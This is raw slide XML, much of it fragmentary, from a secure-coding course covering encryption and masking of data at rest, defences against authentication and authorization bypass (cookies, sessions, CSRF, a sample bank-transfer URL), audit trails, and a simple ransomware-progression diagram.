            <a:ext cx="10007533" cy="3433821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Alias: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None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must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stored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accessed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make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application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valuable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many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variations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privacy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affect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Data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rest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often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risk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simply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existing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Consequences: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in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memory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will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protected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from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malicious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in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files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database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will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protected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from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under-privileged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privacy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restrictions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will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protected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from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under-privileged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viewing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142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6743581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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="2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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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32267"/>
            <a:ext cx="10258293" cy="3984284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597991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Create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define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3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controls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every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operation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every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role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48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three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kinds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Data that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is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private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everyone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except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owner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213121" lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1213756" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>passwords</a:t>
            </a:r>
            <a:endParaRPr sz="1799">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1213121" lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1213756" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-7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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>contents</a:t>
            </a:r>
            <a:endParaRPr sz="1799">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1213121" lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1213756" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-10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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>keys</a:t>
            </a:r>
            <a:endParaRPr sz="1799">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1213121" lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1213756" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Critical</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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9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17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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>PCN,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>SSN</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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99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17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99" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as defined by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> requirements</a:t>
            </a:r>
            <a:endParaRPr sz="17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45"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30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 encrypted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at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rest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lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30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 should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be masked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involved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any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operation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where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might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be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seen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870324" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc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anyone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other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than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owner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(and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possibly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even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then)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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="5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50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client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system,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must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allowed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persist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in an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unencrypted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form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143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6743581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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="2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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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943"/>
            <a:ext cx="10296383" cy="4233712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="34281" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355493" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="27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Data that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is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private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certain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groups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lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30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encrypted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 any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danger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non-privileged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entity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870324" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc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might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see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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30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does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 typically</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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masked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Dat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tha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 is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pri</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-45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ate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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25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no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need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encrypt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or mask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this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423418" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="84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When masking data, it should be done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when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it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leaves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 database, not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when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 viewed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0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may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very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careful,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but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risk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very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high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Client-side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always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danger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Encrypt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files,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databases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in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memory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All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decrypted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copies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overwritten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immediately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after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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2662754"/>
            <a:ext cx="4082622" cy="2548861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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Implementation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2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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Acceptability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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Mechanism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0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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-8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Inputs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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-5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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-4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249" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacks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0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Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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249" spc="-6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spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify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Defend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-7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24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Depth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145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 Coding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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Avoid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Bypass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Attacks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-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Introduction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332267"/>
            <a:ext cx="9780262" cy="2968487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66655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Principle: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Attacks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that bypass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authentication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or authorization gates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are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among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most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dangerous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1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Corollary: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Bypass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attacks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favorites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among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evil-doers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bypass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attack,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attacker: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able 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act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authenticated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without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providing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valid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credentials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able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eso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0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adi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au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riza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ion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ks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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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Many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vulnerabilities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result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 a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bypass,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but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focus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here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authentication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authorization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146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 Coding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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Avoid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Bypass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Attacks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-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Introduction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312640"/>
            <a:ext cx="9021635" cy="3308758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Authentication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bypass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occur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by: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Forceful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browsing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parts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application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fail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authenticate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Stealin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 or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ging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ion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-40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3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Stealing/guessing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credentials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Masque</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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ading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Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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bypass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occur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by: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auth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ntic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tio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byp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Forceful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browsing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parts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application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fail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check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privileges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Forging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credentials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authorization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147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 Coding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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Avoid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Bypass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Attacks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-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Introduction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699" y="1332267"/>
            <a:ext cx="10186557" cy="4094049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767485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Credentials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are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almost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always</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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stolen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from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client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exchange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between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client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server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1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Cookies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co-opted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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attacks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like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Cross-site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Request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Forgery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635444" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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Cookies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stolen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forged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attacker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has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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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which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valid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user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has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authenticated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9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Session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authorization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stored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URL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subject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being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cached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viewed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at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later time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Poor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messaging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might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allow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attacker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guess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credentials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poorly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designed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forgotten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could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allow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attackers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breach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user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accounts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95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pass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eas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 guess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Weak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cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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allow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credentials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stolen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148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775759" y="216482"/>
            <a:ext cx="8638830" cy="7072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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2614"/>
              </a:lnSpc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 Coding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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Bypass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Attacks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-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Security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Design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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="8369660" cy="3433821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Alias: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Complete</a:t>
            </a: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Mediation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uth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ntic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tio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bvi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tor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Clients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must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maintain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form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application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state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elo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 n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ot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pag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Consequences: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Authentication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authorization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bypass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threats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remediated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more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reliable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session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management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60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ul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owsing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em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dia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149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6575992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5" dirty="0"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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0"/>
            <a:ext cx="9886915" cy="3995013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Authentication</a:t>
            </a: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cookies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Must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av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thei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nt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nts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pt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contain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information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locates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(browser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info,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IP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address)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Must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expi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easona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tim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(minute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-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-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rs)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612591" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85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Session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data should not be in the URL and should be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encrypted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if it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includes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information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useful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attacker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5713" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="79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Direct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high-value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transactions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authenticated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client-side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data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should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trusted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0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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://mybank.com/transfer?from=...&amp;to=...&amp;amt=...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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Don't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execute</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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transaction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directly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unless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preceded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proper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page </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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request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within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short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time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length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Ransomware Progression</a:t>
            </a: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684212" y="1676399"/>
            <a:ext cx="10758851" cy="4906497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3838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6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lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rounded Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912812" y="3024747"/>
            <a:ext cx="2286000" cy="220980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tx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tx2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71409" y="3019171"/>
            <a:ext cx="2286000" cy="220980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tx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tx2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331415" y="3019171"/>
            <a:ext cx="2286000" cy="220980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tx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tx2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0012" y="3019171"/>
            <a:ext cx="2286000" cy="220980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tx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tx2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urved Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875212" y="1981200"/>
            <a:ext cx="2743200" cy="1037971"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow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Curved Up Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="5228971"/>
            <a:ext cx="2895600" cy="1019429"/>
          </a:xfrm>
          <a:prstGeom prst="curvedUpArrow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urved Up Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7542212" y="5228970"/>
            <a:ext cx="2895600" cy="1019429"/>
          </a:xfrm>
          <a:prstGeom prst="curvedUpArrow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547621" y="5026413"/>
            <a:ext cx="2125197" cy="70948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Infection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4019919" y="2664429"/>
            <a:ext cx="2125197" cy="70948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Contacts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>command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9665506" y="2743201"/>
            <a:ext cx="1694032" cy="70948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Ransom paid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864815" y="5026413"/>
            <a:ext cx="2125197" cy="70948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Infection</a:t>
            </a:r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>
            <a:off x="1268140" y="3284175"/>
            <a:ext cx="1526224" cy="1629418"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200"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951" y="3251916"/>
            <a:ext cx="1947470" cy="1947470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for lock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512" y="3383561"/>
            <a:ext cx="1471701" cy="14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one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315" y="3452685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48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150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6575992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5" dirty="0"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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267123"/>
            <a:ext cx="10354153" cy="3511270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Using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IP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Addresses for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authentication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insufficient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highly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critical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systems,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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use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two-factor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authentication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stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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systems,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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re-authenticate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re-authorize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every</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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done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via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session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data, but it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must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done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every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request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login/password/forgotten_password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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must be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designed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carefully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ormation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leaka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ong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nfigu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5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able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pass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ong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rypti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 by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rtu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ities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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2662754"/>
            <a:ext cx="4082622" cy="2548861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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Implementation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2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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Acceptability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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Mechanism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0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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-8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Inputs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Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacks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0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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-6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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-6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249" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify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Defend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-7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24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Depth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152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 Coding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Audit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and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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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-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Introduction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332267"/>
            <a:ext cx="10112281" cy="4089157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357398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Principle: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can't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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if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its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operation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can't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 audited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verified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1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must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dit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4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ail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4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atio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 h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av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 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mpon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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999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Login/Logout/Password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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change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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25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read/write/update/delete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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="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Administrative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operations,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user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add/delete,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change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controls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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Resource</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Network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connect/disconnect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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999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Errors/Failures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audit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trail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must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extend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past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long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required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5"/>
